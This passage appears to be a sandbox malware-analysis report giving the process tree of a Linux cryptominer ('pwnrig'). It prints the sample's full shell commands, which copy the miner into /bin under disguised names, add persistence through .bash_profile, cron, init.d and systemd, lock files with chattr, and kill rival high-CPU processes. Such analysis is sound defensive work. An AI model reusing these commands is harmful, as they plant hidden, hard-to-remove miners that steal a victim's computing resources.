\$SNIFFDIR/\$INITD 
2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n#\\n# \$PWNRIG Start/Stop the \$PWNRIG clock daemon.\\n#\\n# chkconfig: 2345 90 60\\n# description: \$PWNRIG (by pwned)\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;chkconfig --add \$PWNRIG 2>/dev/null;chkconfig \$PWNRIG on 2>/dev/null;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which update-rc.d > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;update-rc.d -f \$PWNRIG disable >/dev/null 2>&1;update-rc.d -f \$PWNRIG remove >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n### BEGIN INIT INFO\\n# Provides: \$PWNRIG\\n# Required-Start: \$all\\n# Required-Stop:\\n# Default-Start: 2 3 4 5\\n# Default-Stop:\\n# Short-Description: \$PWNRIG (by pwned)\\n### END INIT INFO\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;update-rc.d \$PWNRIG defaults >/dev/null 2>&1;update-rc.d \$PWNRIG enable >/dev/null 2>&1;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which systemctl > /dev/null 2>&1; then chattr -i -a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$SYSD 2>/dev/null;cp -f -r -- \$MINER 
\$SNIFFDIR/\$SYSD 2>/dev/null;echo -e \"[Unit]\\nDescription=\$PWNRIG\\n\\nWants=network.target\\nAfter=syslog.target network-online.target\\n\\n[Service]\\nType=forking\\nExecStart=/bin/bash -c 'cp -f -r -- \$SNIFFDIR/\$SYSD \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null'\\nRestart=always\\nKillMode=process\\n\\n[Install]\\nWantedBy=multi-user.target\" | tee /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service >/dev/null;sed -i '1 s/-e //' /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service 2>/dev/null;chattr +i +a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;systemctl enable \$PWNRIGE.service 2> /dev/null;systemctl enable \$PWNRIGL.service 2> /dev/null;systemctl daemon-reload 2> /dev/null;systemctl reload-or-restart \$PWNRIGE.service 2> /dev/null;systemctl reload-or-restart \$PWNRIGL.service 2> /dev/null;fi;fi"3⤵
  - File and Directory Permissions Modification
  - Writes file to tmp directory
  PID:3005
    /usr/bin/id  id -u  PID:3006
    /usr/bin/id  id -u  PID:3007
    /usr/bin/chattr  chattr -i -a /bin/bprofr "~/.bash_profile"  PID:3008
    /usr/bin/rm  rm -rf /bin/bprofr  PID:3009
    /usr/bin/sed  sed -i /bprofr/d "~/.bash_profile"  PID:3010
    /usr/bin/cp  cp -f -r -- /tmp/service-agent /bin/bprofr  PID:3011
      - Writes file to system bin folder
    /usr/bin/id  id -u  PID:3012
    /usr/bin/chattr  chattr +i +a /bin/bprofr "~/.bash_profile"  PID:3013
    /usr/bin/mkdir  mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly  PID:3014
    /usr/bin/chattr  chattr -i -a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr  PID:3015
    /usr/bin/rm  rm -rf /bin/crondr  PID:3016
    /usr/bin/cp  cp -f -r -- /tmp/service-agent /bin/crondr  PID:3017
      - Writes file to system bin folder
    /usr/bin/tee  tee /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig  PID:3019
      - Creates/modifies Cron job
    /usr/bin/sed  sed -i "1 s/-e //" /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig  PID:3020
      - Creates/modifies Cron job
    /usr/bin/chmod  chmod +x /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr  PID:3021
      - File and Directory Permissions Modification
    /usr/bin/chattr  chattr +i +a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr  PID:3022
      - Attempts to change immutable files
    /usr/bin/which  which chkconfig  PID:3023
    /usr/bin/which  which update-rc.d  PID:3024
    /usr/bin/chattr  chattr -i -a /etc/init.d/pwnrig /bin/initdr  PID:3025
    /usr/sbin/update-rc.d  update-rc.d -f pwnrig disable  PID:3026
      - Flushes firewall rules
      /usr/local/sbin/systemctl  systemctl --quiet disable pwnrig  PID:3027
      /usr/local/bin/systemctl  systemctl --quiet disable pwnrig  PID:3027
      /usr/sbin/systemctl  systemctl --quiet disable pwnrig  PID:3027
      /usr/bin/systemctl  systemctl --quiet disable pwnrig  PID:3027
      /usr/local/sbin/systemctl  systemctl daemon-reload  PID:3053
      /usr/local/bin/systemctl  systemctl daemon-reload  PID:3053
      /usr/sbin/systemctl  systemctl daemon-reload  PID:3053
      /usr/bin/systemctl  systemctl daemon-reload  PID:3053
    /usr/sbin/update-rc.d  update-rc.d -f pwnrig remove  PID:3079
      /usr/local/sbin/systemctl  systemctl daemon-reload  PID:3080
      /usr/local/bin/systemctl  systemctl daemon-reload  PID:3080
      /usr/sbin/systemctl  systemctl daemon-reload  PID:3080
      /usr/bin/systemctl  systemctl daemon-reload  PID:3080
        - Reads EFI boot settings
    /usr/bin/rm  rm -rf /bin/initdr  PID:3106
    /usr/bin/cp  cp -f -r -- /tmp/service-agent /bin/initdr  PID:3107
      - Writes file to system bin folder
    /usr/bin/tee  tee /etc/init.d/pwnrig  PID:3109
      - Modifies init.d
    /usr/bin/sed  sed -i "1 s/-e //" /etc/init.d/pwnrig  PID:3110
      - Modifies init.d
    /usr/bin/chmod  chmod +x /etc/init.d/pwnrig /bin/initdr  PID:3111
      - File and Directory Permissions Modification
    /usr/sbin/update-rc.d  update-rc.d pwnrig defaults  PID:3112
      /usr/local/sbin/systemctl  systemctl daemon-reload  PID:3113
      /usr/local/bin/systemctl  systemctl daemon-reload  PID:3113
      /usr/sbin/systemctl  systemctl daemon-reload  PID:3113
      /usr/bin/systemctl  systemctl daemon-reload  PID:3113
        - Reads EFI boot settings
    /usr/sbin/update-rc.d  update-rc.d pwnrig enable  PID:3139
      /usr/local/sbin/systemctl  systemctl --quiet enable pwnrig  PID:3140
      /usr/local/bin/systemctl  systemctl --quiet enable pwnrig  PID:3140
      /usr/sbin/systemctl  systemctl --quiet enable pwnrig  PID:3140
      /usr/bin/systemctl  systemctl --quiet enable pwnrig  PID:3140
        - Reads EFI boot settings
      /usr/local/sbin/systemctl  systemctl daemon-reload  PID:3141
      /usr/local/bin/systemctl  systemctl daemon-reload  PID:3141
      /usr/sbin/systemctl  systemctl daemon-reload  PID:3141
      /usr/bin/systemctl  systemctl daemon-reload  PID:3141
    /usr/bin/chattr  chattr +i +a /etc/init.d/pwnrig /bin/initdr  PID:3167
    /usr/bin/which  which systemctl  PID:3168
    /usr/bin/chattr  chattr -i -a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr  PID:3169
    /usr/bin/rm  rm -rf /bin/sysdr  PID:3170
    /usr/bin/cp  cp -f -r -- /tmp/service-agent /bin/sysdr  PID:3171
      - Writes file to system bin folder
    /usr/bin/tee  tee /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service  PID:3173
      - Modifies systemd
    /usr/bin/sed  sed -i "1 s/-e //" /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service  PID:3174
    /usr/bin/chattr  chattr +i +a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr  PID:3175
    /usr/bin/systemctl  systemctl enable pwnrige.service  PID:3176
    /usr/bin/systemctl  systemctl enable pwnrigl.service  PID:3202
      - Reads EFI boot settings
    /usr/bin/systemctl  systemctl daemon-reload  PID:3228
    /usr/bin/systemctl  systemctl reload-or-restart pwnrige.service  PID:3254
      - Reads EFI boot settings

/tmp/service-agent  /tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d  PID:3311
  - Executes dropped EXE
  - Checks hardware identifiers (DMI)
  - Reads hardware information
  - Checks CPU configuration
  - Reads CPU attributes
  - Writes file to tmp directory
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""3⤵
  - Attempts to change immutable files
  PID:3335
    /usr/bin/hostname  hostname -I  PID:3338
    /usr/bin/awk  awk "{print \$1}"  PID:3340
    /usr/bin/awk  awk "{print \"-\"\$2}"  PID:3345
    /usr/bin/head  head -n 1  PID:3344
    /usr/bin/grep  grep "Port "  PID:3343
    /usr/bin/cat  cat /etc/ssh/sshd_config  PID:3342
    /usr/bin/whoami  whoami  PID:3346
    /usr/bin/hostname  hostname  PID:3347
    /usr/bin/grep  grep -c "^processor" /proc/cpuinfo  PID:3348
      - Checks CPU configuration
    /usr/bin/sed  sed -e "s/\$//"  PID:3354
    /usr/bin/sed  sed -e "s/^ *//"  PID:3353
    /usr/bin/cut  cut -d: -f2  PID:3352
    /usr/bin/grep  grep -m 1 "model name" /proc/cpuinfo  PID:3351
    /usr/bin/awk  awk "{print \$1}"  PID:3357
    /usr/bin/awk  awk "{print \$4}"  PID:3360
    /usr/bin/awk  awk "{print \$4}"  PID:3363

/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵PID:3364
    /usr/bin/awk  awk "/[zZ]/ && !a[\$2]++ {print \$2}"  PID:3366
    /usr/bin/ps  ps -A "-ostat,ppid"  PID:3365
      - Reads CPU attributes
    /usr/bin/id  id -u  PID:3368
    /usr/bin/grep  grep -v grep  PID:3371
    /usr/bin/grep  grep /etc/cron  PID:3370
    /usr/bin/ps  ps x  PID:3369
      - Reads runtime system information

/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵
  - Security Software Discovery
  PID:3373
    /usr/bin/id  id -u  PID:3374
    /usr/bin/awk  awk "{if(\$3>30.0) print \$2}"  PID:3379
    /usr/bin/grep  grep -v /usr/sbin/httpd  PID:3378
    /usr/bin/grep  grep -v -- "-bash[[:space:]]*\$"  PID:3377
    /usr/bin/grep  grep -v grep  PID:3376
    /usr/bin/ps  ps aux  PID:3375
      - Reads CPU attributes
      - Process Discovery

/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"3⤵
  - Security Software Discovery
  PID:3381
    /usr/bin/id  id -u  PID:3382
    /usr/bin/wc  wc -l  PID:3388
    /usr/bin/awk  awk "{if(\$3>30.0) print \$2}"  PID:3387
    /usr/bin/grep  grep -- "-bash[[:space:]]*\$"  PID:3386
    /usr/bin/grep  grep -v grep  PID:3385
    /usr/bin/ps  ps aux  PID:3384
      - Process Discovery

/usr/bin/crontab  crontab -r  PID:3409
/usr/bin/pkill  pkill -f .klibsystem5  PID:3410
/usr/bin/pkill  pkill -f .klibsystem4  PID:3411
  - Reads CPU attributes
  - Reads runtime system information
/usr/bin/bash  bash -c "echo \"* * * * * /var/run/.klibsystem5 >/dev/null 2>&1\" | crontab -"  PID:3412
  /usr/bin/crontab  crontab -  PID:3414
    - Creates/modifies Cron job
/usr/bin/chattr  chattr -ia /etc/cron.d/.lib-knlib4  PID:3415
/usr/bin/chattr  chattr +ia /etc/cron.d/.lib-knlib4  PID:3416
/usr/bin/chattr  chattr -ia /var/spool/cron/.lib-knlib4  PID:3417
/usr/bin/chattr  chattr +ia /var/spool/cron/.lib-knlib4  PID:3418
/usr/bin/chattr  chattr -ia /etc/cron.hourly/.lib-knlib4  PID:3419
/usr/bin/chattr  chattr +ia /etc/cron.hourly/.lib-knlib4  PID:3420
/usr/bin/chattr  chattr -ia /etc/cron.daily/.lib-knlib4  PID:3421
/usr/bin/chattr  chattr +ia /etc/cron.daily/.lib-knlib4  PID:3422
/usr/bin/chattr  chattr -ia /etc/cron.weekly/.lib-knlib4  PID:3423
/usr/bin/chattr  chattr +ia /etc/cron.weekly/.lib-knlib4  PID:3424
/usr/bin/chattr  chattr -ia /etc/cron.monthly/.lib-knlib4  PID:3425
  - Attempts to change immutable files
/usr/bin/chattr  chattr +ia /etc/cron.monthly/.lib-knlib4  PID:3426
  - Attempts to change immutable files
/usr/bin/chattr  chattr -ia /etc/anacrontab  PID:3427
/usr/bin/chattr  chattr +ia /etc/anacrontab  PID:3428
/tmp/sys-helper  /tmp/sys-helper  PID:3429
  - Executes dropped EXE
  - Writes file to tmp directory
/tmp/service-agent  /tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d -pwn  PID:3430
  - Executes dropped EXE
  - Checks hardware identifiers (DMI)
  - Reads hardware information
  - Checks CPU configuration
  - Reads CPU attributes
  - Enumerates kernel/hardware configuration
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""3⤵PID:3431
    /usr/bin/hostname  hostname -I  PID:3434
    /usr/bin/awk  awk "{print \$1}"  PID:3436
    /usr/bin/awk  awk "{print \"-\"\$2}"  PID:3441
    /usr/bin/head  head -n 1  PID:3440
    /usr/bin/grep  grep "Port "  PID:3439
    /usr/bin/cat  cat /etc/ssh/sshd_config  PID:3438
    /usr/bin/whoami  whoami  PID:3442
    /usr/bin/hostname  hostname  PID:3443
    /usr/bin/grep  grep -c "^processor" /proc/cpuinfo  PID:3444
      - Checks CPU configuration
    /usr/bin/sed  sed -e "s/\$//"  PID:3450
    /usr/bin/sed  sed -e "s/^ *//"  PID:3449
    /usr/bin/cut  cut -d: -f2  PID:3448
    /usr/bin/grep  grep -m 1 "model name" /proc/cpuinfo  PID:3447
      - Checks CPU configuration
    /usr/bin/awk  awk "{print \$1}"  PID:3453
    /usr/bin/awk  awk "{print \$4}"  PID:3456
    /usr/bin/awk  awk "{print \$4}"  PID:3459

/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵PID:3460
    /usr/bin/awk  awk "/[zZ]/ && !a[\$2]++ {print \$2}"  PID:3462
    /usr/bin/ps  ps -A "-ostat,ppid"  PID:3461
    /usr/bin/id  id -u  PID:3464
    /usr/bin/grep  grep -v grep  PID:3467
    /usr/bin/grep  grep /etc/cron  PID:3466
    /usr/bin/ps  ps x  PID:3465

/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then SNIFFDIR='/bin';PWNDIR='/bin'; else rm -rf /tmp/.pwn 2>/dev/null;mkdir /tmp/.pwn 2>/dev/null;SNIFFDIR='/tmp/.pwn';PWNDIR='/tmp';fi;PWNRIG='pwnrig';PWNRIGE='pwnrige';PWNRIGL='pwnrigl';CROND='crondr';SYSD='sysdr';INITD='initdr';BPROFILE='bprofr';MINER='/tmp/service-agent';PROGRAM='-bash';if [ `id -u 2>/dev/null` -eq '0' ]; then chattr -i -a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;fi;rm -rf \$SNIFFDIR/\$BPROFILE 2>/dev/null;sed -i \"/\$BPROFILE/d\" ~/.bash_profile 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$BPROFILE 2>/dev/null;echo \"cp -f -r -- \$SNIFFDIR/\$BPROFILE \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null\" >> ~/.bash_profile 2>/dev/null;if [ `id -u 2>/dev/null` -eq '0' ]; then chattr +i +a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly 2>/dev/null;chattr -i -a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$CROND 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$CROND 2>/dev/null;echo -e \"#!/bin/bash\\ncp -f -r -- \$SNIFFDIR/\$CROND \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/cron.d/\$PWNRIG /etc/cron.daily/\$PWNRIG /etc/cron.hourly/\$PWNRIG /etc/cron.monthly/\$PWNRIG /etc/cron.weekly/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/cron.*/\$PWNRIG 2>/dev/null;chmod +x /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND 2>/dev/null;chattr +i +a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;if which chkconfig > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;chkconfig \$PWNRIG off 2>/dev/null;chkconfig --del \$PWNRIG 2>/dev/null;rm -rf \$SNIFFDIR/\$INITD 
2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n#\\n# \$PWNRIG Start/Stop the \$PWNRIG clock daemon.\\n#\\n# chkconfig: 2345 90 60\\n# description: \$PWNRIG (by pwned)\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;chkconfig --add \$PWNRIG 2>/dev/null;chkconfig \$PWNRIG on 2>/dev/null;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which update-rc.d > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;update-rc.d -f \$PWNRIG disable >/dev/null 2>&1;update-rc.d -f \$PWNRIG remove >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n### BEGIN INIT INFO\\n# Provides: \$PWNRIG\\n# Required-Start: \$all\\n# Required-Stop:\\n# Default-Start: 2 3 4 5\\n# Default-Stop:\\n# Short-Description: \$PWNRIG (by pwned)\\n### END INIT INFO\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;update-rc.d \$PWNRIG defaults >/dev/null 2>&1;update-rc.d \$PWNRIG enable >/dev/null 2>&1;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which systemctl > /dev/null 2>&1; then chattr -i -a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$SYSD 2>/dev/null;cp -f -r -- \$MINER 
\$SNIFFDIR/\$SYSD 2>/dev/null;echo -e \"[Unit]\\nDescription=\$PWNRIG\\n\\nWants=network.target\\nAfter=syslog.target network-online.target\\n\\n[Service]\\nType=forking\\nExecStart=/bin/bash -c 'cp -f -r -- \$SNIFFDIR/\$SYSD \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null'\\nRestart=always\\nKillMode=process\\n\\n[Install]\\nWantedBy=multi-user.target\" | tee /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service >/dev/null;sed -i '1 s/-e //' /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service 2>/dev/null;chattr +i +a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;systemctl enable \$PWNRIGE.service 2> /dev/null;systemctl enable \$PWNRIGL.service 2> /dev/null;systemctl daemon-reload 2> /dev/null;systemctl reload-or-restart \$PWNRIGE.service 2> /dev/null;systemctl reload-or-restart \$PWNRIGL.service 2> /dev/null;fi;fi"3⤵
  - File and Directory Permissions Modification
  - Writes file to tmp directory
  PID:3469
    /usr/bin/id  id -u  PID:3470
    /usr/bin/id  id -u  PID:3471
    /usr/bin/chattr  chattr -i -a /bin/bprofr "~/.bash_profile"  PID:3472
      - Attempts to change immutable files
    /usr/bin/rm  rm -rf /bin/bprofr  PID:3473
    /usr/bin/sed  sed -i /bprofr/d "~/.bash_profile"  PID:3474
    /usr/bin/cp  cp -f -r -- /tmp/service-agent /bin/bprofr  PID:3475
      - Writes file to system bin folder
    /usr/bin/id  id -u  PID:3476
    /usr/bin/chattr  chattr +i +a /bin/bprofr "~/.bash_profile"  PID:3477
    /usr/bin/mkdir  mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly  PID:3478
    /usr/bin/chattr  chattr -i -a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr  PID:3479
    /usr/bin/rm  rm -rf /bin/crondr  PID:3480
    /usr/bin/cp  cp -f -r -- /tmp/service-agent /bin/crondr  PID:3481
      - Writes file to system bin folder
    /usr/bin/tee  tee /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig  PID:3483
      - Creates/modifies Cron job
